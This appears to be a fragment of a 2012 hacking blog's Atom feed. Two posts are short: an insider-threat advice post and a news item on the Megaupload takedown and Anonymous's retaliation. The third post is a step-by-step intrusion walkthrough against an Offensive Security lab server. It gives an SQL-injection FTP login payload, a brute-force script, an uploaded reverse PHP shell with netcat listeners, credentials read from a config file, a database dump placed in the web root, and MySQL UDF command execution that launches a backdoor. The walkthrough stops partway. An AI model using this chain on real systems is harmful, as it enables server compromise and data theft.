&lt;strong&gt;Be Aware and Vigilant When Dealing With Insider Threats &lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Whether they modify data, steal critical codes, sell company secrets or commit payroll fraud, insiders are the biggest security threats a company will face. While there is always an element of risk, you can decrease information system vulnerability with these common sense steps. Most importantly, by being aware and vigilant, you’ll be better prepared to avoid the losses that far too many organizations suffer at the hands of trusted insiders.&lt;br /&gt;
&lt;br /&gt;
As more companies move more of their businesses online we should expect to see more threats. Formal IT security training can help defend against these threats. Consider Villanova University’s online programs such as their &lt;a href="http://www.villanovau.com/cissp-certification/"&gt;CISSP certification&lt;/a&gt; prep courses&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-3493825831003460069?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=x_3U9Vq7lSA:myAP8Gb4JF4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=x_3U9Vq7lSA:myAP8Gb4JF4:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=x_3U9Vq7lSA:myAP8Gb4JF4:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=x_3U9Vq7lSA:myAP8Gb4JF4:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=x_3U9Vq7lSA:myAP8Gb4JF4:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=x_3U9Vq7lSA:myAP8Gb4JF4:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=x_3U9Vq7lSA:myAP8Gb4JF4:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=x_3U9Vq7lSA:myAP8Gb4JF4:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=x_3U9Vq7lSA:myAP8Gb4JF4:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=x_3U9Vq7lSA:myAP8Gb4JF4:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=x_3U9Vq7lSA:myAP8Gb4JF4:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/x_3U9Vq7lSA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/3493825831003460069/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2012/01/how-to-deal-with-insider-threats.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3493825831003460069?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3493825831003460069?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/x_3U9Vq7lSA/how-to-deal-with-insider-threats.html" title="How To Deal With Insider Threats?" /><author><name>Rafay Baloch</name><uri>http://www.blogger.com/profile/15944091083959815608</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="21" height="32" src="http://2.bp.blogspot.com/-Oq2sCvNga_8/TkK_2qTfs-I/AAAAAAAABXY/GpgdW28vfHM/s220/226160_10150278468603001_538643000_7900302_426914_n.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-8f9W7v-iAMM/Tx3GIpCAKTI/AAAAAAAABtg/efJ1l505zoM/s72-c/insider_threat.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2012/01/how-to-deal-with-insider-threats.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0QHSH89cCp7ImA9WhRUEUU.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-2899790619397669847</id><published>2012-01-21T15:37:00.000-08:00</published><updated>2012-01-21T15:42:19.168-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-21T15:42:19.168-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking News" /><title>FBI Shudowns Megaupload.com, Anonymous Shutdowns FBI</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: left;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-MN_0fKeqBrw/TxtKeRKiFrI/AAAAAAAAANs/RFXYtkJULu0/s1600/megauploadcom.n.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="149" src="http://4.bp.blogspot.com/-MN_0fKeqBrw/TxtKeRKiFrI/AAAAAAAAANs/RFXYtkJULu0/s200/megauploadcom.n.jpg" width="200" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Megaupload.com was shut down by FBI on Thursday.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;A day after a 24-hour blackout of popular Websites such as  Wikipedia, Reddit and BoingBoing, which were protesting a pair of  controversial anti-piracy bills(SOPA/PIPA) making their way through Congress, FBI stepped in and shut down one of the world's  largest file-sharing sites Megaupload.com, also charged four people connected to it in New Zealand and seized Millions in cash from the authorities. However three of the higher authorities are on the run and thought not to be in New Zealand.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-If2sXeldlrI/TxtK4AlCRFI/AAAAAAAAAN0/23JVaekkv_4/s1600/article-2089138-11629EF0000005DC-472_634x502.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="253" src="http://3.bp.blogspot.com/-If2sXeldlrI/TxtK4AlCRFI/AAAAAAAAAN0/23JVaekkv_4/s320/article-2089138-11629EF0000005DC-472_634x502.jpg" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Kim Dotcom former CEO of Megaupload.com was Captured by FBI&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;Online piracy by the two companies - Megaupload Ltd and Vestor Ltd -  made &amp;nbsp; more than $ 175 million in criminal proceeds and caused more   than half a billion dollars in harm to copyright owners &lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-buOz_bvfNk0/Txs985O_L3I/AAAAAAAAANU/Smkn3c9PQT4/s1600/banner.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="300" src="http://4.bp.blogspot.com/-buOz_bvfNk0/Txs985O_L3I/AAAAAAAAANU/Smkn3c9PQT4/s400/banner.jpg" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Banner on Megaupload.com after taken down by FBI.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
However, after megaupload was shuttered by FBI, Anonymous - a group of hackers retaliated by taking down DOJ and many White House websites. Fbi.gov was also taken down but was recovered lately. The hacking group released a document on file-sharing site  Pastebin.com listing the websites they planned&amp;nbsp; to attack along with the  names of US Democratic Party leaders and MPAA employees and their  families.&lt;br /&gt;
&lt;br /&gt;
The details included property values,&amp;nbsp; work and home  phone numbers and addresses as well as the names, ages and schools of  the member's children.&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-vOXG_c1zYeQ/TxtC7LZK-7I/AAAAAAAAANc/bscuEPrwDdM/s1600/Motion+Picture+Association+of+America+%2528MPAA%2529+and+US+Democratic+party+leaders.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="360" src="http://2.bp.blogspot.com/-vOXG_c1zYeQ/TxtC7LZK-7I/AAAAAAAAANc/bscuEPrwDdM/s640/Motion+Picture+Association+of+America+%2528MPAA%2529+and+US+Democratic+party+leaders.jpg" width="577" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;A screen shot of the dossier of MPAA and US Democratic Party members and their families compiled and published by Anonymous.&lt;/td&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;The document posted on postbin.com also said &lt;/span&gt;&lt;span style="font-size: small;"&gt;'We Anonymous are launching our largest attack ever on government and music industry sites. Lulz.&lt;/span&gt; &lt;span style="font-size: small;"&gt;'The FBI didn't think they would get away with this did they? They should have expected us.'&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
"Megaupload was taken down w/out SOPA being law. Now imagine what will  happen if it passes. The Internet as we know it will end. FIGHT BACK,"  wrote @YourAnonNews on Twitter in a reference to the ongoing battle in  Congress over the controversial Stop Online Piracy Act (SOPA).&lt;br /&gt;
&lt;div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"&gt;This attack is thought to be the largest ever with 5000+ people involved in bringing down the government and entertainment industry websites. &lt;/div&gt;&lt;div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="http://3.bp.blogspot.com/-JNKXD5Z5XB8/TxtJ8Q6sFAI/AAAAAAAAANk/O2d1zqvlwwQ/s1600/article-2089138-11605AB8000005DC-527_634x386.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="193" src="http://3.bp.blogspot.com/-JNKXD5Z5XB8/TxtJ8Q6sFAI/AAAAAAAAANk/O2d1zqvlwwQ/s320/article-2089138-11605AB8000005DC-527_634x386.jpg" width="320" /&gt;&lt;/a&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;Megaupload&lt;/span&gt; was &lt;span class="hps"&gt;unique&lt;/span&gt; &lt;span class="hps"&gt;not only&lt;/span&gt; &lt;span class="hps"&gt;because of the&lt;/span&gt; &lt;span class="hps"&gt;size and&lt;/span&gt; &lt;span class="hps"&gt;amount of&lt;/span&gt; &lt;span class="hps"&gt;content&lt;/span&gt;s, but &lt;span class="hps"&gt;also because of the&lt;/span&gt; &lt;span class="hps"&gt;high level of&lt;/span&gt; &lt;span class="hps"&gt;support from&lt;/span&gt; &lt;span class="hps"&gt;celebrities&lt;/span&gt;, &lt;span class="hps"&gt;musicians and&lt;/span&gt; &lt;span class="hps"&gt;other&lt;/span&gt; &lt;span class="hps"&gt;content&lt;/span&gt; &lt;span class="hps"&gt;producers that&lt;/span&gt; &lt;span class="hps"&gt;are the most common&lt;/span&gt; &lt;span class="hps"&gt;victims&lt;/span&gt; &lt;span class="hps"&gt;of copyright&lt;/span&gt; &lt;span class="hps"&gt;infringement and&lt;/span&gt; &lt;span class="hps"&gt;piracy.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="hps"&gt;&lt;/span&gt;&lt;/span&gt; For many users, the shutdown had nothing to do with piracy and  everything to do with the fact that their backups and data were now  gone.&amp;nbsp;&lt;/div&gt;&lt;div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;If convicted&lt;/span&gt;&lt;span style="font-size: small;"&gt; each individual could be  jailed for up to 20 years on the &lt;/span&gt;&lt;span style="font-size: small;"&gt;charges of five counts  of racketeering, copyright infringement and conspiracy.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3121270199089759062-2899790619397669847?l=www.rafayhackingarticles.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=EylWbIMlLao:ahXAgjqgHgo:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=EylWbIMlLao:ahXAgjqgHgo:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=EylWbIMlLao:ahXAgjqgHgo:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=EylWbIMlLao:ahXAgjqgHgo:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=EylWbIMlLao:ahXAgjqgHgo:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=EylWbIMlLao:ahXAgjqgHgo:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=EylWbIMlLao:ahXAgjqgHgo:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=EylWbIMlLao:ahXAgjqgHgo:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=EylWbIMlLao:ahXAgjqgHgo:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=EylWbIMlLao:ahXAgjqgHgo:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=EylWbIMlLao:ahXAgjqgHgo:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/EylWbIMlLao" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/2899790619397669847/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2012/01/fbi-shut-down-megauploadcom-anonymous.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/2899790619397669847?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/2899790619397669847?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/EylWbIMlLao/fbi-shut-down-megauploadcom-anonymous.html" title="FBI Shudowns Megaupload.com, Anonymous Shutdowns FBI" /><author><name>The Azimiester</name><uri>http://www.blogger.com/profile/17180645495014233184</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="19" height="32" src="http://1.bp.blogspot.com/-45n3ZmzUKRQ/TsraO93lCSI/AAAAAAAAAMQ/4HKxTxmV4sM/s220/209351_10150169988473088_827063087_6858220_4227046_o.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-MN_0fKeqBrw/TxtKeRKiFrI/AAAAAAAAANs/RFXYtkJULu0/s72-c/megauploadcom.n.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2012/01/fbi-shut-down-megauploadcom-anonymous.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkEHRHs8fip7ImA9WhRUEUo.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-9074288813092411791</id><published>2012-01-21T11:37:00.000-08:00</published><updated>2012-01-21T11:37:15.576-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-21T11:37:15.576-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="videos" /><title>Penetration Testing in the Real World By Offensive Security</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-o8seGH95K94/TxsQtIA6ZzI/AAAAAAAABsw/8embR8E42Lg/s1600/firefox-vulnerable.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://3.bp.blogspot.com/-o8seGH95K94/TxsQtIA6ZzI/AAAAAAAABsw/8embR8E42Lg/s200/firefox-vulnerable.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Why browsing on the internet, I found an excellent video&amp;nbsp;regarding penetration testing in real world by offensive security. Penetration testing in the real world is really difficult from what you do inside testing environments like webgoat, DVWA tools etc. There are lots of security mechanisms being implemented now a days like IDS, IPS, firewalls etc. Therefore Penetration testing in the real world has became quite difficult. In the following video the instructor&amp;nbsp;explains&amp;nbsp;penetration testing in real world. He goes right away from exploiting the Filetransfer protocol right up to gaining administrator&amp;nbsp;access&amp;nbsp;to the machine. &lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;iframe src="http://player.vimeo.com/video/11213607?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="577" height="500" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen&gt;&lt;/iframe&gt;&lt;p&gt;&lt;a href="http://vimeo.com/11213607"&gt;Penetration Testing in the Real World&lt;/a&gt; from &lt;a href="http://vimeo.com/offsec"&gt;Offensive Security&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;&lt;i&gt;ftp-brute.py&lt;/i&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;i&gt;#!/usr/bin/python&lt;/i&gt;&lt;i&gt;from ftplib import FTP&lt;/i&gt;&lt;i&gt;print "Attempting user Directory Discover via FTP"&lt;/i&gt;&lt;i&gt;for i in range(0,6):&lt;/i&gt;&lt;i&gt;username=%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT "+ STR(I)+",1; -- "&lt;/i&gt;&lt;i&gt;password=str("1")&lt;/i&gt;&lt;i&gt;ftp=FTP('www.offseclabs.com')&lt;/i&gt;&lt;i&gt;ftp.login(username,password)&lt;/i&gt;&lt;i&gt;print "Logged in as user "+str(i)+",1"&lt;/i&gt;&lt;i&gt;ftp.retrlines('LIST')&lt;/i&gt;&lt;i&gt;ftp.close()&lt;/i&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/blockquote&gt;&lt;br /&gt;
&lt;b&gt;Open Terminal A : &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
nmap -p 21,80 www.offseclabs.com&lt;br /&gt;
nc -v www.offseclabs.com 80&lt;br /&gt;
HEAD / HTTP/1.0&lt;br /&gt;
(To enumerate the webserver)&lt;br /&gt;
clear&lt;br /&gt;
ftp www.offseclabs.com&lt;br /&gt;
username - bob&lt;br /&gt;
password - bob&lt;br /&gt;
(To enumerate the ftp server)&lt;br /&gt;
ftp www.offseclabs.com&lt;br /&gt;
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --&lt;br /&gt;
password - 1&lt;br /&gt;
(logged in to the ftp server)&lt;br /&gt;
pwd&lt;br /&gt;
ls&lt;br /&gt;
bye&lt;br /&gt;
clear&lt;br /&gt;
cd core&lt;br /&gt;
clear&lt;br /&gt;
nano brute.py --&amp;gt; (see above ftp-brute.py)&lt;br /&gt;
./brute.py&lt;br /&gt;
(get the fifth user who has mapped to the root directory of webserver)&lt;br /&gt;
clear&lt;br /&gt;
&lt;br /&gt;
ftp www.offseclabs.com&lt;br /&gt;
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --&lt;br /&gt;
password - 1&lt;br /&gt;
(logged in as the fifth user)&lt;br /&gt;
ls&lt;br /&gt;
put rs.php --&amp;gt; (a reverse php shell) Download reverse PHP shell&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;-----------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Open Terminal B :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;nc -lvp 80&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;-----------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Open Terminal C :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;wget www.offseclabs.com/rs.php&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(Then, at Terminal B, we got a reverse shell)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;-----------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Go back to Terminal B :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(inside the reverse shell)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;/sbin/ifconfig&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;pwd&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;cd /var/www&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;ls -la&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;cd includes&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;cat configure.php&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(get the MySQL username and password as well as MySQL server address and database name)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce &amp;gt; /var/www/images/ccdump.txt&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;------------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Open a Firefox :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;www.offseclabs.com/images/ccdump.txt&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(we got the database dump)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;-------------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Go back to Terminal A :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(inside the ftp server)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;put up.html --&amp;gt; (file upload html file)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;put up.php -- &amp;gt; (file upload php file)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;-------------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Open Firefox :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;www.offseclabs.com/up.html&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(upload lib_mysqludf_sys.so and marked it as 1)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(upload rs [a binary reverse shell) and marked it as 2)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;** Details of lib_mysqludf_sys.so&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;---------------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Go back to Terminal A :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(quit the ftp server)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;bye&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;clear&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;exit&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(quit Terminal A)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;----------------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Go back to Terminal B :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(login to MySQL server)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;use pwn;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;SELECT imgdata from binfile where title="2" into dumpfile '/tmp/db';&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;SELECT sys_eval('chmod 755 /tmp/bd');&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;SELECT sys_eval('/tmp/bd &amp;amp;');&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(don't press Enter at this moment)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;---------------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Open Terminal D :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;nc -lvp 80&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(go back to Terminal B and press enter, you will get reserver shell at Terminal D)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;----------------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Open Terminal E :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;nc -lvp 80&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;----------------------------&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Go back to Terminal B :&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;(inside the MySQL server)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;SELECT sys_eval('/tmp/bd &amp;amp;');&lt;/b&gt;&lt;br /&gt;
